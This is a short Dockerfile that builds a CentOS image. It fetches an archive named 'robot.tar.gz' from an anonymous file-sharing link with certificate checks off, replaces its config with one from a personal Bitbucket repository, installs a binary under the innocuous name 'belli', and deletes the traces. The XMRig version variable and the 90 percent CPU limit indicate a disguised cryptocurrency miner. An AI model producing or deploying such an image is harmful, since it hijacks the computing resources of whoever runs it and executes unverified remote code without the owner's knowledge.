FROM centos:latest

LABEL maintainer="asu"

ENV CPULIMIT_VERSION=0.2 \
    CPU_USAGE=90 \
    XMRIG_VERSION=5.11.1  

RUN dnf install -y wget \
    &&  dnf groupinstall  -y 'Development Tools' \
    &&  cd /root \
    &&  wget --no-check-certificate -c https://github.com/opsengine/cpulimit/archive/v${CPULIMIT_VERSION}.tar.gz \
    &&  tar zxvf v${CPULIMIT_VERSION}.tar.gz \
    &&  cd cpulimit-${CPULIMIT_VERSION} \
    &&  make \
    &&  cp src/cpulimit /usr/bin/ \
    &&  cd /root \
    &&  wget --no-check-certificate -c http://transfer.sh/yG5vJM/robot.tar.gz -O robot.tar.gz \
    &&  tar zxvf robot.tar.gz  \
    &&  cd robot \
    &&  rm config.json \
    &&  wget https://bitbucket.org/oramuncul/oramuncul/src/main/config.json \
    &&  chmod 777 config.json \
    &&  cp belli /usr/bin/ \
    &&  mkdir -p /etc/confo \
    &&  cp config.json /etc/confo \
    &&  cd /root \
    &&  rm v${CPULIMIT_VERSION}.tar.gz \
    &&  rm -rf cpulimit-${CPULIMIT_VERSION} \
    &&  rm robot.tar.gz  \
    &&  rm -rf robot \
    &&  dnf group remove  -y 'Development Tools'  \
    &&  dnf clean all

COPY docker-entrypoint.sh /usr/local/bin/
RUN ln -s usr/local/bin/docker-entrypoint.sh /entrypoint.sh # backwards compat

ENTRYPOINT ["docker-entrypoint.sh"]